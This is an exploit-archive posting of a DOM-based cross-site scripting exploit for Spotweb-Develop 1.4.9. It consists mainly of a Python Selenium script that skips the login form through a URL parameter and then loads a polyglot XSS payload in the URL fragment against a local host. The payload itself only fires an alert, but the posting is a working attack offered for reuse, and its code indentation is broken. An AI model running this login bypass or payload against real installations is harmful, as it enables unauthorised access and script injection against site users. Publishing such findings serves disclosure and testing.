Spotweb-Develop 1.4.9 Cross Site Scripting

Spotweb-Develop 1.4.9 Cross Site Scripting: Posted May 20, 2021; Authored by nu11secur1ty; Spotweb-Develop version 1.4.9 suffers from a cross site scripting vulnerability.; tags | exploit, xss; SHA-256 | edc08c2a5faaffc264b7ebd53bd4a33e8c3c676b0c81127f6aa98fce2d4127ad; Download | Favorite | View

Spotweb-Develop 1.4.9 Cross Site Scripting

# Exploit Title: Cross Site Scripting (DOM Based) spotweb-develop 1.4.9
# Author: @nu11secur1ty
# Testing and Debugging: nu11secur1ty $ OWASP-ZAP
# Date: 05.20.2021
# Vendor: https://www.nzbserver.com/
# Link: https://github.com/spotweb/spotweb
# CVE: 2021-XXXX
# Proof: https://streamable.com/hix5o1

[+] Exploit Source:
#!/usr/bin/python3
# Author: @nu11secur1ty
# CVE-2021-XXXX

from selenium import webdriver
import time
import os, sys


# Vendor: https://www.nzbserver.com/
# Jump over login form :D
website_link="
http://192.168.1.160/spotweb-develop/?page=login&data[htmlheaderssent]=true"

# enter your login username
username="nu11secur1ty"

# enter your login password
password="password"

#enter the element for username input field
element_for_username="loginform[username]"

#enter the element for password input field
element_for_password="loginform[password]"

#enter the element for submit button
element_for_submit="loginform[submitlogin]"


#browser = webdriver.Safari() #for macOS users[for others use chrome vis
chromedriver]
browser = webdriver.Chrome() #uncomment this line,for chrome users
#browser = webdriver.Firefox() #uncomment this line,for chrome users

time.sleep(3)
browser.get((website_link))

try:
username_element = browser.find_element_by_name(element_for_username)
username_element.send_keys(username)
password_element  = browser.find_element_by_name(element_for_password)
password_element.send_keys(password)
signInButton = browser.find_element_by_name(element_for_submit)
signInButton.click()

# Exploit Cross Site Scripting (DOM Based)
# Payload: #jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert()
)//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

time.sleep(1)
# Payload link "esc-rule"
browser.get(("
http://192.168.1.160/spotweb-develop#jaVasCript:/*-/*`/*\`/*'/*"'/**/(/*
*/oNcliCk=alert()
)//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e'""))

print("The payload is deployed DOM is BOMing you ':))'...\n")
os.system('pause')

browser.close()

except Exception:
#### This exception occurs if the element are not found in the webpage.
print("DOM...")

---------------------------------

# Exploit Title: Cross Site Scripting (DOM Based) spotweb-develop 1.4.9
# Date: 05.20.2021
# Exploit Authotr idea: nu11secur1ty
# Exploit Debugging: nu11secur1ty & OWASP-ZAP
# Vendor Homepage: https://www.nzbserver.com/
# Software Link: https://github.com/spotweb/spotweb/releases

# Steps to Reproduce:
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-SPOTWEB-SXX-DOM

Top Authors In Last 30 Days

Red Hat 228 files
Ubuntu 89 files
Gentoo 31 files
Debian 22 files
tmrswrr 10 files
Sina Kheirkhah 7 files
bRpsd 4 files
Rodolfo Tavares 4 files
nu11secur1ty 3 files
Google Security Research 3 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,079)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,380)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,289)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,663)
UNIX (9,426)
UnixWare (187)
Windows (6,666)
Other

Spotweb-Develop 1.4.9 Cross Site Scripting

Spotweb-Develop 1.4.9 Cross Site Scripting

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Spotweb-Develop 1.4.9 Cross Site Scripting

Share This

Spotweb-Develop 1.4.9 Cross Site Scripting

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems